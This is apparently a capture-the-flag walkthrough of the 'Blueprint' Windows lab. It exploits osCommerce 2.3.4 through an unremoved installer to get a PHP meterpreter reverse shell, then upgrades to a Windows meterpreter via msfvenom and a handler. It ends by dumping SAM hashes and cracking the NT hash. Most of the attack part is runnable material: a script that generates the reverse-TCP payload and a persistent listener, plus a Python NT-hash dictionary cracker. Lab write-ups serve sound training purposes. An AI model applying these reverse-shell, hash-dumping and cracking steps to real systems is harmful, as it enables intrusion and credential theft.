Blueprint

New Vocabulary

  • LM hash (LanMan hash)
    • the legacy, broken password hash that Microsoft LAN Manager and early Windows used to store passwords. The password is upper-cased, truncated or padded to 14 characters and split into two 7-byte halves, each of which is used as a DES key to encrypt a fixed constant; the halves can be cracked independently, so the effective keyspace is tiny. Modern Windows stores the empty LM value aad3b435b51404eeaad3b435b51404ee instead.
  • NTLM (New Technology LAN Manager)
    • a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality. NTLM is a challenge-response protocol used to authenticate a client to a resource on an Active Directory domain or on a stand-alone Windows machine. The "NTLM hash" (NT hash) that hashdump pulls from the SAM is MD4 of the UTF-16LE password; it is unsalted, so it can be looked up in precomputed tables (crackstation) or replayed directly in pass-the-hash.

Accessing MariaDB (unauthorized)

  • mysql -h 10.10.120.20 -u root
    • ERROR 1130: Host '<our IP>' is not allowed to connect to this MariaDB server
      • this is a host grant restriction, not a failed login: there is no mysql.user row permitting root from our address, so the server refuses before any password is checked. Not a way in from outside; the database becomes reachable only once we have code execution on the box itself.

Exploit osCommerce 2.3.4

https://www.exploit-db.com/exploits/44374

  • Use [[MetaSploit]] to exploit an admin setup error: the /install/ directory was never removed after installation, so the installer can be re-run unauthenticated and made to write attacker-controlled PHP into the application's configuration file, which is then included on the next request
    • This pops a meterpreter reverse TCP shell
      • It is a php/meterpreter, which has limited options (no priv extension, so hashdump and migrate are unavailable), hence the upgrade below

Upgrade meterpreter shell by using msfvenom

  • Craft a native Windows payload to be uploaded through the php/meterpreter shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.69.101 LPORT=4448 -f exe -o meterpreter.exe
  • Open a new msfconsole and start a handler that matches the payload exactly: msf6 > use exploit/multi/handler, then set payload windows/meterpreter/reverse_tcp, set LHOST 10.6.69.101, set LPORT 4448, run (a handler left on the default payload or a different port will not stage the session)
  • Upload the payload to the remote machine from the php/meterpreter session: meterpreter > upload ~/Downloads/meterpreter.exe C:/
  • Then execute the uploaded payload: meterpreter > execute -f meterpreter.exe (use the full path C:/meterpreter.exe if the PHP process's working directory is elsewhere)
  • The listening msfconsole will now receive a windows/meterpreter session
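Added example, not from the original notes: a small POSIX shell script that drives the steps above so the msfvenom payload and the multi/handler are generated from the same payload, LHOST and LPORT and cannot drift apart. The LHOST/LPORT defaults are the values quoted in the notes; the handler.rc file name, the `build` argument and the output directory are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): scripts the php/meterpreter -> windows/meterpreter
# upgrade so the msfvenom payload and the multi/handler always agree on payload, LHOST and LPORT.
# LHOST/LPORT defaults are the values quoted in the notes; file names are assumptions.
set -eu

LHOST="${LHOST:-10.6.69.101}"
LPORT="${LPORT:-4448}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
EXE="${EXE:-meterpreter.exe}"

# The exact msfvenom invocation, kept in one place so the handler is derived from the same values.
build_msfvenom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' "$PAYLOAD" "$LHOST" "$LPORT" "$EXE"
}

# Resource script for the second msfconsole: `msfconsole -q -r handler.rc`.
# ExitOnSession false plus -j -z keeps the handler backgrounded and alive, so a re-run of the
# payload (or a second box) can connect back without restarting the listener.
write_handler_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
    printf '%s\n' "$rc"
}

# Commands to type into the existing php/meterpreter session. The full path avoids depending on
# whatever working directory the PHP process happens to have.
print_session_steps() {
    cat <<EOF
upload $EXE C:/
execute -f C:/$EXE
EOF
}

# Only touches msfvenom when invoked as: sh upgrade.sh build [outdir]
if [ "${1:-}" = "build" ]; then
    outdir="${2:-.}"
    write_handler_rc "$outdir/handler.rc"
    if command -v msfvenom >/dev/null 2>&1; then
        (cd "$outdir" && eval "$(build_msfvenom_cmd)")
    else
        echo "msfvenom not found; run manually: $(build_msfvenom_cmd)" >&2
    fi
    echo "Start the handler: msfconsole -q -r $outdir/handler.rc"
    echo "Then, in the php/meterpreter session:"
    print_session_steps
fi
```

Run `sh upgrade.sh build /tmp/bp` on the attacking machine, start the handler from the generated resource script, and paste the printed upload/execute lines into the php/meterpreter session; the new windows/meterpreter session lands in the handler console.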

Getting the flags

  • Use hashdump in the windows/meterpreter session to dump the SAM (needs SYSTEM; run getsystem first if it fails). Each line is user:RID:LMhash:NThash:::, and an LM field of aad3b435b51404eeaad3b435b51404ee means LM storage is disabled, so the NT hash is the one to crack
    • Use crackstation to get the password (the NT hash is unsalted, so a precomputed lookup works; the same hash could also be passed directly without cracking)
  • root.txt is in C:/Users/Administrator/Desktop
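Added example, not from the original notes: parsing hashdump output and cracking the NT hash offline with a wordlist, which is the same computation crackstation performs against its precomputed tables. The sample hashdump lines are constructed (a local account whose password is "password" and a Guest with an empty password), not data from the Blueprint box. MD4 is implemented in pure Python because hashlib's md4 is a legacy algorithm that many OpenSSL 3 builds no longer expose.

```python
# Added example (not from the original notes): parse meterpreter `hashdump` output and crack
# the NT hashes offline against a wordlist. NT hash = MD4(UTF-16LE(password)), unsalted.
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. LM storage disabled


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _md4_round(state, X, fn, const, order, shifts):
    # Sixteen steps; each rewrites one state word, cycling a, d, c, b as in RFC 1320.
    for i in range(16):
        t = (-i) % 4
        x, y, z = state[(t + 1) % 4], state[(t + 2) % 4], state[(t + 3) % 4]
        state[t] = _rotl((state[t] + fn(x, y, z) + X[order[i]] + const) & MASK32, shifts[i % 4])


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib.new('md4') is often unavailable under OpenSSL 3)."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = h[:]
        _md4_round(s, X, F, 0, list(range(16)), (3, 7, 11, 19))
        _md4_round(s, X, G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13))
        _md4_round(s, X, H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15))
        h = [(a + b) & MASK32 for a, b in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text: str):
    """Parse `user:RID:LM:NT:::` lines into dicts; blank and '#' lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
                        "lm_disabled": lm.lower() == EMPTY_LM})
    return entries


def crack(entries, wordlist):
    """Dictionary attack: one MD4 per candidate, checked against every dumped NT hash at once."""
    targets = {}
    for e in entries:
        targets.setdefault(e["nt"], []).append(e["user"])  # users can share a hash
    found = {}
    for word in wordlist:
        for user in targets.get(nt_hash(word), []):
            found.setdefault(user, word)
    return found


# Constructed sample (not real Blueprint data): Administrator's password is "password", Guest's is empty.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_HASHDUMP)
    for e in entries:
        print(f"{e['user']} (RID {e['rid']}): LM {'disabled' if e['lm_disabled'] else 'PRESENT, weak'}, NT {e['nt']}")
    print(crack(entries, ["letmein", "Password1", "password", ""]))
```

Feeding the real hashdump text to `parse_hashdump` and a wordlist such as rockyou to `crack` gives the same answer crackstation returns for a hash that is in its tables; hashes it does not know are exactly the ones worth passing rather than cracking.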